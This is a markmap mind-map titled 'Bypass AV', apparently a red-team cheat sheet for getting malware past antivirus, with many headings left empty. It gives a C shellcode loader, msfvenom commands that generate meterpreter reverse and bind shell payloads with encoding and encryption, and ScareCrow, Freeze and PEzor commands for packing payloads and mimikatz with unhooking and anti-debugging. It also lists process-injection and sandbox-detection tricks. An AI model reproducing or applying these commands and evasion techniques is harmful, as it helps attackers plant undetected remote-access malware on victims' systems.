---
markmap:
  colorFreezeLevel: 3
  initialExpandLevel: 2
---

# Bypass AV

## Manual dropper

### C++

## Automatic dropper

## Manual loader

### Reminder

1. allocate memory
2. move the shellcode into that memory
3. execute the shellcode

### Go

### C

```c
#include <windows.h>
#include <stdio.h>

/* Loading the DLL runs its DllMain, which is where the shellcode executes. */
int main(void)
{
    HMODULE hMod = LoadLibrary("shellcode.dll");
    if (hMod == NULL) {
        fprintf(stderr, "Failed to load shellcode.dll (error %lu)\n", GetLastError());
        return 1;
    }
    FreeLibrary(hMod);
    return 0;
}
```

### C++

### .NET

### Ruby

## Automatic loader

### C++/C#

### C

### Nim

### Go

### Rust

### Crystal

## Generate shellcode

### msfvenom

- `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f raw`
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll`
- `msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more`

### C2 (Cobalt Strike, Havoc, etc.)

### ASM

### Hyperion

- `wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe`

## Manual obfuscation

### Static

- Packing
- Polymorphism
- Signature hiding
- CFG (control-flow graph)
  - ROP
  - CFG flattening
- Change logo/icon
- Change the compilation timestamp
- Bypass AMSI
  - Description
  - Add signature

### Dynamic

- Network
  - C2 over DNS
  - P2P (hide the C2 IP)
  - HTTPS
- Direct syscalls
- Delayed execution
  - WaitForSingleObjectEx
  - Foliage
  - Ekko
    - A small sleep obfuscation technique that uses the CreateTimerQueueTimer Win32 API
  - Deathsleep
- Disable ETW
- DInvoke

## Automatic obfuscation

### Static

- Packing
  - Office macro
- AMSI bypass
- Signature hiding
  - `ScareCrow -I /Path/To/ShellCode -d facebook.com`
- LOLBIN
  - RemComSvc
- Entropy

### Dynamic

- Disable ETW
- Indirect syscalls
  - `Freeze -I /PathToShellcode -encrypt -sandbox -o packed.exe`
  - `PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2`
- Disable AV
- Block DLL
- Detect virtual machines

## Process injection

### CRT (CreateRemoteThread)

- with a suspended thread

### APC (Asynchronous Procedure Call)

### Process hollowing

### Thread execution hijacking

### PSC (Ptrace System Calls)

### Process Doppelgänging

### DLL injection

- Reflective DLL injection
- DLL sideloading & proxying

### RWX

- Allocate the region as RW, write the shellcode into it, then reprotect it to RX and only then start the thread. This way the region is never RWX.

### COM hijack

### Remote thread

### User APC

## Detect virtual machines (Sandbox)

### Software

- Count running processes
  - if >= 40, it is probably not a sandbox
- User interaction
  - Show a MessageBoxW and continue only once it has been clicked
- Check for internet connectivity
- Compare the current date with the compilation date
- Check the computer name
  - default name DESKTOP-[0-9A-Z]{7} hints at an unconfigured VM (weak signal: many real hosts keep the default name too)

### Hardware

- CPUID timing (CPUID traps to the hypervisor, so it is measurably slower in a VM)
- A typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive; anything smaller is suspicious

### OSX

### Tools

## From PE to shellcode

## From .exe (built with .NET) to hidden .exe

## From a live beacon

### Havoc

- dotnet (object file)

### Cobalt

- BoF (Beacon object file)
  - From .NET to BoF

## Extensions

### Dll

### Exe

### Hta

### Cpl

### Link

## Credits

- [@Jenaye_fr](https://twitter.com/Jenaye_fr)
- [LeDocteurDesBits](https://github.com/LeDocteurDesBits)
- [michmich1000](https://github.com/michmich1000)
- [@Zabannn](https://twitter.com/Zabannn)
- [@noraj_rawsec](https://twitter.com/noraj_rawsec)
- [@lapinousexy](https://github.com/lap1nou)
- [@djnn](https://github.com/bogdzn)

## Pro tips

Shellcode that has been run through three open-source packers is more likely to be detected than shellcode that was obfuscated by hand.